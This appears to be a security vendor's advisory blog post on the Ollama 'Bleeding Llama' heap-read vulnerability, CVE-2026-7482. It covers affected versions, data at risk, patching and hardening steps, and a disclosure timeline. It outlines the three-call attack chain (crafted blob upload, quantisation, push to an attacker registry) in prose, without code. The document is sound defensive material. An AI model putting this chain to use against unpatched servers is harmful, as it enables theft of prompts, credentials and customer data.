Which Ollama versions are affected?

All versions of Ollama before 0.17.1 are affected. The fix was included in version 0.17.1, released after the vulnerability was reported in February 2026. If you are running any earlier version, you should update immediately.

Does this affect cloud-hosted LLM APIs like OpenAI or Anthropic?

No. This vulnerability is specific to self-hosted Ollama deployments. Cloud-hosted LLM APIs from providers like OpenAI, Anthropic, and Google have their own security controls and are not affected by CVE-2026-7482. However, if your organisation uses Ollama alongside cloud APIs, any API keys stored in the Ollama server environment could be leaked.

How can I check if my Ollama server was compromised?

Check your Ollama logs for unexpected calls to /api/create and /api/push endpoints, especially from unfamiliar IP addresses. Review whether any models were created or pushed to external registries without your knowledge. If your server was internet-facing on an older version, assume compromise and rotate all credentials, API keys, and tokens that may have been in the server process memory.

Bleeding Llama: Ollama CVE-2026-7482 Explained

Bleeding Llama: Critical Ollama Vulnerability Exposes 300,000 AI Servers

Published: 9 May 2026 Reviewed by: Spencer Schotel 5 min read

A critical vulnerability dubbed "Bleeding Llama" has been disclosed in Ollama, the widely used open-source framework for running large language models locally. Discovered by Dor Attias at Cyera Research, CVE-2026-7482 allows unauthenticated attackers to silently steal the entire contents of an Ollama server's memory — including user prompts, API keys, conversation history, and customer data — using just three API calls.

With an estimated 300,000 internet-facing Ollama instances and a public proof-of-concept already available, this is one of the most significant AI infrastructure vulnerabilities disclosed to date. If your organisation runs Ollama in any capacity, read on.

CVSS Score	9.1 (Critical)
CVE	CVE-2026-7482
Affected Software	Ollama < 0.17.1
Type	Heap out-of-bounds read (CWE-125)
Attack Vector	Network (unauthenticated, no user interaction)
Discovered By	Dor Attias, Cyera Research
Fixed In	Ollama 0.17.1
Public PoC	Available on GitHub

How the Attack Works

The vulnerability lives in Ollama's GGUF (GPT-Generated Unified Format) model loader — specifically in how it handles tensor offsets during quantisation. An attacker supplies a malicious GGUF file where the declared tensor offset and size exceed the file's actual length. When Ollama processes this file, it reads past the allocated heap buffer, pulling adjacent process memory into the model weights.

Why Go's memory safety doesn't help: Ollama is written in Go, a memory-safe language. But the vulnerable code uses Go's unsafe package for low-level memory operations — bypassing all of Go's built-in safety guarantees. The one place Ollama uses unsafe is exactly where this vulnerability lives.

The full attack chain requires no authentication, no user interaction, and no privileged access:

Upload malicious blob — POST /api/blobs/sha256:<hash>. The attacker uploads a crafted GGUF file with oversized tensor declarations.
Trigger quantisation — POST /api/create. Create a model from the blob and request F16-to-F32 quantisation. Ollama reads past the buffer and bakes leaked memory into model weights. The F16-to-F32 conversion path is lossless, preserving stolen bytes intact.
Exfiltrate — POST /api/push. Push the model (with embedded heap data) to an attacker-controlled registry. The server sends your memory contents to the attacker.

What Data Is at Risk

Because the exploit leaks arbitrary process memory, the potential data exposure is severe:

User prompts and chat history — every conversation from every user, including confidential questions, proprietary code, and internal documents reviewed via AI.
API keys and secrets — environment variables containing database credentials, third-party API tokens, cloud provider keys, and authentication secrets.
System prompts — the instructions that define your AI's behaviour, revealing business logic, internal processes, and competitive IP.
Customer data — contracts, financial data, personal information, and any customer content processed through the AI. A potential GDPR breach.

The Bigger Problem: AI Infrastructure Is the New Shadow IT

Bleeding Llama is not just an Ollama bug — it's a symptom of a broader pattern. Businesses are deploying AI infrastructure with the urgency of a startup and the security posture of a hobby project. Ollama launches without authentication by default. The documented OLLAMA_HOST=0.0.0.0 configuration exposes it to the entire internet. And until the CVE was assigned nearly three months after the fix shipped, most operators had no idea they needed to update.

This mirrors the early days of unsecured MongoDB and Elasticsearch instances in the 2010s — databases exposed to the internet with no authentication, leading to thousands of data breaches. We are now seeing the same pattern repeated with AI inference servers: Ollama, vLLM, LocalAI, and custom LLM deployments being stood up by development teams without security review.

Ask your teams today: Is anyone running Ollama, LM Studio, vLLM, or any local LLM inference server? If the answer is yes (or "I don't know"), you have an unmanaged attack surface that needs immediate attention.

What You Should Do Right Now

Immediate Actions

Update Ollama to v0.17.1 or later — this is the minimum. Check your version with ollama --version.
Audit your network — scan for any Ollama instances listening on 0.0.0.0:11434. Use ss -tlnp | grep 11434 or your asset discovery tooling.
Block public access — if Ollama must be network-accessible, put it behind an authentication proxy (Cloudflare Access, OAuth2 Proxy, or Tailscale).
Restrict dangerous endpoints — at minimum, block /api/create and /api/push from external access via your reverse proxy.
Assume compromise if exposed — if your Ollama server was internet-facing on a pre-0.17.1 version, rotate all credentials, API keys, and tokens that may have been in process memory.

Longer-Term Measures

Include AI infrastructure in your security testing scope — traditional web application pen tests don't cover LLM inference servers. Ensure your security assessments explicitly include AI tooling.
Maintain an AI asset inventory — know every LLM, agent, and inference server running in your environment. Shadow AI deployments are the new shadow IT.
Apply the same controls as production databases — authentication, encryption in transit, network segmentation, access logging, and regular patching. AI servers process data that is often more sensitive than what's in your database.
Review your MCP server security — if you're running AI agents that connect to MCP servers via Ollama, the entire chain needs hardening.

Disclosure Timeline

Date	Event
Feb 2, 2026	Dor Attias of Cyera Research reports the vulnerability to the Ollama security team.
Feb 25, 2026	Ollama acknowledges and shares a fix, included in version 0.17.1.
Mar 2, 2026	Researcher submits CVE request to MITRE. No response received.
Apr 28, 2026	Echo (third-party CNA) assigns CVE-2026-7482 — nearly 3 months after the fix.
May 4, 2026	Full details published by Cyera Research. Public PoC exploit available on GitHub.

The Bottom Line

Bleeding Llama is a wake-up call for every organisation deploying local AI infrastructure. The vulnerability is critical, the attack is trivial, and the data exposure is total. But beyond this specific CVE, the lesson is clear: AI infrastructure must be treated with the same security rigour as your production databases and web applications.

At YUPL, our CREST-aligned penetration testing team specifically tests AI infrastructure — including Ollama, vLLM, MCP servers, and custom agent deployments. If you're running local LLMs in any capacity, get in touch for an AI security assessment or call us on 0330 229 4580.

Frequently Asked Questions

What is the Bleeding Llama vulnerability?

Bleeding Llama (CVE-2026-7482) is a critical heap out-of-bounds read vulnerability in Ollama that allows unauthenticated attackers to leak the entire server process memory — including user prompts, API keys, conversation history, and customer data. It was discovered by Cyera Research and carries a CVSS score of 9.1. All Ollama versions before 0.17.1 are affected.

How many servers are at risk?

Approximately 300,000 Ollama instances are publicly accessible on the internet. While Ollama defaults to localhost, the commonly used OLLAMA_HOST=0.0.0.0 configuration exposes it externally. All internet-facing instances on versions before 0.17.1 are exploitable without any authentication.

Does this affect cloud AI APIs like OpenAI or Anthropic?

No. This vulnerability is specific to self-hosted Ollama deployments. Cloud AI providers have their own security controls. However, if you use Ollama alongside cloud APIs, any API keys stored in the Ollama server's environment could be leaked through this vulnerability.

How do I check if I was compromised?

Review your Ollama logs for unexpected calls to /api/create and /api/push from unfamiliar IPs. Check whether any models were pushed to external registries. If your server was internet-facing on a pre-0.17.1 version, assume compromise and rotate all credentials, API keys, and tokens that may have been in server memory.